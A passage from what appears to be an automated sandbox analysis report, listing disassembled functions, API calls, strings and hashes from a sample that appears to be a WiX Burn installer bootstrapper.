                                                                                                                                                              • Instruction Fuzzy Hash: A461D870A06256BBCB10DB96CC42EAEBBA9FF58720F604255F421FB2D0D7789E40D790
                                                                                                                                                              Function 008077F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00807857
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 0080787C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 0080789C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008078CF
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008078EB
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807916
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080798D
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008079D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Compare$Free
                                                                                                                                                              • String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                              • API String ID: 318886736-782967201
                                                                                                                                                              • Opcode ID: 1998aa6e8eb31aca646af3a1f0df778841377d324a959a8062ead2f12172e9a3
                                                                                                                                                              • Instruction ID: a8004e6b55e0ef2f4e84a11d44bd775feee78baa6d422bbef0a71963e0550e31
                                                                                                                                                              • Opcode Fuzzy Hash: 1998aa6e8eb31aca646af3a1f0df778841377d324a959a8062ead2f12172e9a3
                                                                                                                                                              • Instruction Fuzzy Hash: BD613B72D08219BBDB51DB94CC45EAEBBB9FF04720F2142A5E521E62E0D734AE50DB90
                                                                                                                                                              Function 00808134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00808161
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0080817C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0080821F
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0080B518,00000000), ref: 0080825E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008082B1
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,0080B518,000000FF,true,000000FF), ref: 008082CF
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00808307
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0080844B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                              • API String ID: 1825529933-3037633208
                                                                                                                                                              • Opcode ID: 9d7bcb134d7bc470cfc1aae93c0a0597275404aafa841c3f7efc73766199f638
                                                                                                                                                              • Instruction ID: f62b8d510f049a88f065031b865c80a214fd640ec7dab92ad555b1a394777c67
                                                                                                                                                              • Opcode Fuzzy Hash: 9d7bcb134d7bc470cfc1aae93c0a0597275404aafa841c3f7efc73766199f638
                                                                                                                                                              • Instruction Fuzzy Hash: 21B1AB31604606EBDBA09F58CC85F5A7BA6FF44730F218619F9A5EB2D1DB74E881CB04
                                                                                                                                                              Function 007DE3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007DE2AF: LoadBitmapW.USER32(?,00000001), ref: 007DE2E5
                                                                                                                                                                • Part of subcall function 007DE2AF: GetLastError.KERNEL32 ref: 007DE2F1
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 007DE429
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 007DE43D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE448
                                                                                                                                                              • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 007DE54D
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007DE55C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                              • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                                                              • API String ID: 164797020-2188509422
                                                                                                                                                              • Opcode ID: f53b3aedfd6f29521be303d0db96f8ec0cd18fc05d3bd8c9fd56480ef072d6fd
                                                                                                                                                              • Instruction ID: 3348c869d463e8f7337584799df8cc243873c5d032c36b13741d15f8b8c25f12
                                                                                                                                                              • Opcode Fuzzy Hash: f53b3aedfd6f29521be303d0db96f8ec0cd18fc05d3bd8c9fd56480ef072d6fd
                                                                                                                                                              • Instruction Fuzzy Hash: F241A772900615BFEB12ABD4ED49EAEB7B9FF04754F110126FA01FA350E7789D108BA1
                                                                                                                                                              Function 007E9DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,007EBC85,00000001), ref: 007E9E46
                                                                                                                                                              • GetLastError.KERNEL32(?,007EBC85,00000001), ref: 007E9FB6
                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000001,00000000,?,007EBC85,00000001), ref: 007E9FF6
                                                                                                                                                              • GetLastError.KERNEL32(?,007EBC85,00000001), ref: 007EA000
                                                                                                                                                              Strings
                                                                                                                                                              • Cache thread exited unexpectedly., xrefs: 007EA047
                                                                                                                                                              • Failed to wait for cache check-point., xrefs: 007E9FE7
                                                                                                                                                              • Failed to execute MSP package., xrefs: 007E9ECB
                                                                                                                                                              • Failed to execute compatible package action., xrefs: 007E9F73
                                                                                                                                                              • Invalid execute action., xrefs: 007EA056
                                                                                                                                                              • Failed to execute dependency action., xrefs: 007E9F36
                                                                                                                                                              • Failed to execute MSU package., xrefs: 007E9EFB
                                                                                                                                                              • Failed to execute EXE package., xrefs: 007E9E7D
                                                                                                                                                              • Failed to execute MSI package., xrefs: 007E9EA6
                                                                                                                                                              • Failed to execute package provider registration action., xrefs: 007E9F17
                                                                                                                                                              • apply.cpp, xrefs: 007E9FDD, 007EA027
                                                                                                                                                              • Failed to get cache thread exit code., xrefs: 007EA031
                                                                                                                                                              • Failed to load compatible package on per-machine package., xrefs: 007E9F5C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                              • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                                                              • API String ID: 3703294532-2662572847
                                                                                                                                                              • Opcode ID: ec393e30f3fba871047306fd1e9f8cf897490476d01d706b5c798bab1a6f96da
                                                                                                                                                              • Instruction ID: 76df63cab61b074c3b760cfa0af4b4f3b511c3b7aecd4897d80725163f0d2d8b
                                                                                                                                                              • Opcode Fuzzy Hash: ec393e30f3fba871047306fd1e9f8cf897490476d01d706b5c798bab1a6f96da
                                                                                                                                                              • Instruction Fuzzy Hash: E9716072A02295FBDB10CF55C941EAEB7B8FF48710F104169FA15EB340E338AE409BA1
                                                                                                                                                              Function 007CF210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00803AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00803B3E
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00810D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 007CF440
                                                                                                                                                                • Part of subcall function 008014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,007CF28D,00810D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008014BB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseValueVersion
                                                                                                                                                              • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                                                                                                                              • API String ID: 2348918689-2631711097
                                                                                                                                                              • Opcode ID: b2a45924617a076cb77a57cd1e423567db6570542bf74c90cfe34e7c93c373c8
                                                                                                                                                              • Instruction ID: 537e0bb1cf1a33f160bbd0509c3ebbfe0932fc06a6c3f7a5a634b0e5562f13fd
                                                                                                                                                              • Opcode Fuzzy Hash: b2a45924617a076cb77a57cd1e423567db6570542bf74c90cfe34e7c93c373c8
                                                                                                                                                              • Instruction Fuzzy Hash: FB51B331941666FADF259AA48C0AFAEB76AFF00720F11013DF910F6290D77C9A909AD1
                                                                                                                                                              Function 007ECC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 007ECC9D
                                                                                                                                                                • Part of subcall function 007D4D8D: UuidCreate.RPCRT4(?), ref: 007D4DC0
                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,007E2401,?,?,00000000,?,?,?), ref: 007ECD7B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 007ECD85
                                                                                                                                                              • GetProcessId.KERNEL32(007E2401,?,?,00000000,?,?,?,?), ref: 007ECDBD
                                                                                                                                                                • Part of subcall function 007D54DC: lstrlenW.KERNEL32(?,?,00000000,?,0080B500,?,00000000,?,007C452F,?,0080B500), ref: 007D54FD
                                                                                                                                                                • Part of subcall function 007D54DC: GetCurrentProcessId.KERNEL32(?,007C452F,?,0080B500), ref: 007D5508
                                                                                                                                                                • Part of subcall function 007D54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,007C452F,?,0080B500), ref: 007D553F
                                                                                                                                                                • Part of subcall function 007D54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,007C452F,?,0080B500), ref: 007D5554
                                                                                                                                                                • Part of subcall function 007D54DC: GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D555E
                                                                                                                                                                • Part of subcall function 007D54DC: Sleep.KERNEL32(00000064,?,007C452F,?,0080B500), ref: 007D5593
                                                                                                                                                                • Part of subcall function 007D54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55B6
                                                                                                                                                                • Part of subcall function 007D54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55D1
                                                                                                                                                                • Part of subcall function 007D54DC: WriteFile.KERNEL32(?,/E|,0080B500,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55EC
                                                                                                                                                                • Part of subcall function 007D54DC: WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,007C452F,?,0080B500), ref: 007D5607
                                                                                                                                                                • Part of subcall function 00800A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00800A38
                                                                                                                                                                • Part of subcall function 00800A28: GetLastError.KERNEL32(?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800A46
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECE41
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECE50
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?), ref: 007ECE67
                                                                                                                                                              Strings
                                                                                                                                                              • embedded.cpp, xrefs: 007ECDA6
                                                                                                                                                              • Failed to process messages from embedded message., xrefs: 007ECE04
                                                                                                                                                              • Failed to wait for embedded process to connect to pipe., xrefs: 007ECDDF
                                                                                                                                                              • Failed to wait for embedded executable: %ls, xrefs: 007ECE24
                                                                                                                                                              • Failed to allocate embedded command., xrefs: 007ECD54
                                                                                                                                                              • %ls -%ls %ls %ls %u, xrefs: 007ECD40
                                                                                                                                                              • Failed to create embedded pipe., xrefs: 007ECD27
                                                                                                                                                              • Failed to create embedded process at path: %ls, xrefs: 007ECDB3
                                                                                                                                                              • Failed to create embedded pipe name and client token., xrefs: 007ECD00
                                                                                                                                                              • burn.embedded, xrefs: 007ECD38
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                                              • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                              • API String ID: 875070380-3803182736
                                                                                                                                                              • Opcode ID: 971acae5923df8c24942ff04c685dc10f9a5cebb17ea757a33a488caef5a9f1f
                                                                                                                                                              • Instruction ID: e84b2e552b78c2bb33a9fa6e37b657d5068399ede07786eb3d050256e99c6a54
                                                                                                                                                              • Opcode Fuzzy Hash: 971acae5923df8c24942ff04c685dc10f9a5cebb17ea757a33a488caef5a9f1f
                                                                                                                                                              • Instruction Fuzzy Hash: 8E517C76E41269FBDF12DA94DC06BDEBBB9EB08710F100122FA00F6291D7799A419BD1
                                                                                                                                                              Function 007CECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007CEE4C
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007CEE04
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                              • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
                                                                                                                                                              • API String ID: 336948655-956346883
                                                                                                                                                              • Opcode ID: 098c8601a3a73e7de0d81d644c3e21906cde8808b710200f2c0302a66057fc98
                                                                                                                                                              • Instruction ID: 531c54a926f0d825383bcf2552bb66d18047439b9fcad175ebe32c4fd4de5905
                                                                                                                                                              • Opcode Fuzzy Hash: 098c8601a3a73e7de0d81d644c3e21906cde8808b710200f2c0302a66057fc98
                                                                                                                                                              • Instruction Fuzzy Hash: 1A518035A0162AEBDB21DB98C895FAEBBA8FF00B50B10416DF911EB240C778DE409790
                                                                                                                                                              Function 00807F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,00808468,00000001,?), ref: 00807F9E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00808468,00000001,?), ref: 00807FB9
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00808468,00000001,?), ref: 00807FD4
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00808468,00000001,?), ref: 00808040
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00808468,00000001,?), ref: 00808064
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00808468,00000001,?), ref: 00808088
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00808468,00000001,?), ref: 008080A8
                                                                                                                                                              • lstrlenW.KERNEL32(006C0064,?,00808468,00000001,?), ref: 008080C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString$lstrlen
                                                                                                                                                              • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                                                              • API String ID: 1657112622-2492263259
                                                                                                                                                              • Opcode ID: eff5c35366c9a2986b97b18ba4809cf44046b9e19b17e6760355c73678ec7fd0
                                                                                                                                                              • Instruction ID: 328ab227b29b5b095f26d55035379c3f818557e6cdcd6435daec750e4a9a8a20
                                                                                                                                                              • Opcode Fuzzy Hash: eff5c35366c9a2986b97b18ba4809cf44046b9e19b17e6760355c73678ec7fd0
                                                                                                                                                              • Instruction Fuzzy Hash: A8518131648622FBDB605E54DC46F167A62FB15B30F208314F674EA2D1DBB5E8908B90
                                                                                                                                                              Function 007CA03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA0B6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16
                                                                                                                                                              • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                              • API String ID: 3613110473-2134270738
                                                                                                                                                              • Opcode ID: 678fe0fe28bb6698749b8119d98d7baaaaa648b983f689517cd7b533016506df
                                                                                                                                                              • Instruction ID: 4bc59d947c96af604ed35ffc9fdbb7dd75e79768bbf8ecd2101f33f58605f766
                                                                                                                                                              • Opcode Fuzzy Hash: 678fe0fe28bb6698749b8119d98d7baaaaa648b983f689517cd7b533016506df
                                                                                                                                                              • Instruction Fuzzy Hash: E761C432D4012CBBCB119AA8CD49F9E7B78FB45319F14016DF914FA291D63BDE409B92
                                                                                                                                                              Function 007D4B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 007D4B84
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D4B92
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 007D4BB6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorFileLastSleep
                                                                                                                                                              • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                                                                                                              • API String ID: 408151869-3212458075
                                                                                                                                                              • Opcode ID: 088054d47b899eb3b569ed53304b0cf2b0a1fa8e7ae463def39fa16148513fc0
                                                                                                                                                              • Instruction ID: fb73979d5ef5e720fc5a73ea6deb2d286f71133da7bacf0c509d87eaa6865c4b
                                                                                                                                                              • Opcode Fuzzy Hash: 088054d47b899eb3b569ed53304b0cf2b0a1fa8e7ae463def39fa16148513fc0
                                                                                                                                                              • Instruction Fuzzy Hash: FB41F376992632BBDB3156A0CD06F5A7AB8BF10720F110223FE14BA390D77D9D409AE4
                                                                                                                                                              Function 007E69D2 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 153serviceCOMMON
                                                                                                                                                              Download Yara Rule
